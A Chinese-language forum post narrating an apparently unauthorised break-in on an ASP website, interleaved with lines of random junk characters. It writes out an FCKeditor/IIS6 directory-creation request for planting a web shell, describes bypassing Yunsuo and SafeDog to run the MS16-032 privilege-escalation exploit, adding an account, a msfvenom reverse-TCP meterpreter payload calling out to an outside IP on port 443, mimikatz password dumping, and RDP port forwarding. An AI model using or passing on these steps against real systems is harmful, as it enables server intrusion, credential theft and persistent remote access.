|
0 I5 q' l9 W: h$ g
! r, Q. F: g" ?# q( @
* U# ?! S8 R5 k, U ! M, a- n% E- i; Q1 ~0 u& X0 z
| # P8 Z* Y s$ C6 V/ U$ ~9 z
1 p7 G4 m1 @" r. N" N/ [ X
8 t4 G6 ~% ^! k/ K, J一、 利用getwebshell篇
# i, u, ^: z+ S
# p9 G* J9 x8 H, f# E% E
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
* P( x: z+ Y$ V9 @
, e: l; R' ~4 R
4 n3 [' W1 w& V! m下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
$ H$ W% ^; c' h+ B* a1 h8 B
5 b( s" o$ q0 [. ^" l" @, @: G w
下面我们构造一个asp目录,如: " D2 Z- ^) y( V8 y* ^0 F" x
7 u, I; x$ T8 p! b4 d0 u3 F' _ - H1 B s2 e9 l' f
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
7 A4 P3 c# A& o& _; ?: ]" n( [) W
, N* _* b2 [6 J; o+ u/ C; X# j 8 `7 r9 L. i3 v8 w n9 ~; V
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
. E$ p* G5 s& h
" H% K" O- D7 V
一、 绕过安全狗云锁提权并且加账号
' j6 i/ Z) ?% U& v: B( T
+ D4 _" p0 n" K没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
# m7 {. w2 l0 h% M
9 J8 J# v9 [, Q: R7 h. X8 {; L9 R如图:
1 y4 M- V" K; z- p
9 b) F8 [* M. l$ u, F
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
( {4 H# L9 ^" h% q, n7 g4 g# w
' G& X" v( r+ y- S8 j
一、 利用metasploit
: m8 W. x" J, j3 D# b& J
- D. ]0 i& T/ E6 K6 [' |: o& h首先用pentestbox生成一个64位的payload如下命令
- o3 T9 E8 s( ?: Z2 E9 G' u
* O" [! `1 ^5 M' DmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
! R o! j- m' r# S9 r
# \% g \1 @& d9 b. k+ T# k) N [
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
) w4 `. ?, h' R* K0 @7 s
: Q+ I1 p3 @ u/ I7 e下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
- E3 `: B" i2 H9 p4 j; |" S
- f' U7 q9 \, I0 k5 m下面我们来做一个监听如下命令:
' B- K) l# B6 T: I" a
4 x6 H5 Q2 A$ jportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
' `9 ]* C% L# K0 L+ {8 S3 ] 6 Z) L* w; Y/ K
" ^+ v& ~$ W: g/ c, f$ A+ L4 r9 e& ~ |
8 N: ]1 q2 @& W8 S; c& m1 L2 j 7 c' c6 ^9 i: b( B6 Y8 t' I4 L
# B% G. \. a8 y2 b1 D/ P2 T( _
# c7 a1 m3 x- D4 Y( H' G' o
' F5 C5 l( u a2 f! N' [
! G: l5 R' K& ?- i5 n! T
& I& p) D' g6 i
( U1 }# `0 E1 _( W$ s' [
" x- X6 M" W) G- `1 u 9 S9 I; q, S2 y, Y$ R
, M' W& K$ w0 |+ Y- L
2 l' c7 ~! U* D, G- P; m
, \2 z: o. C) J- S; n
0 Y! B, Q" @! g9 Z, G# O: U
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06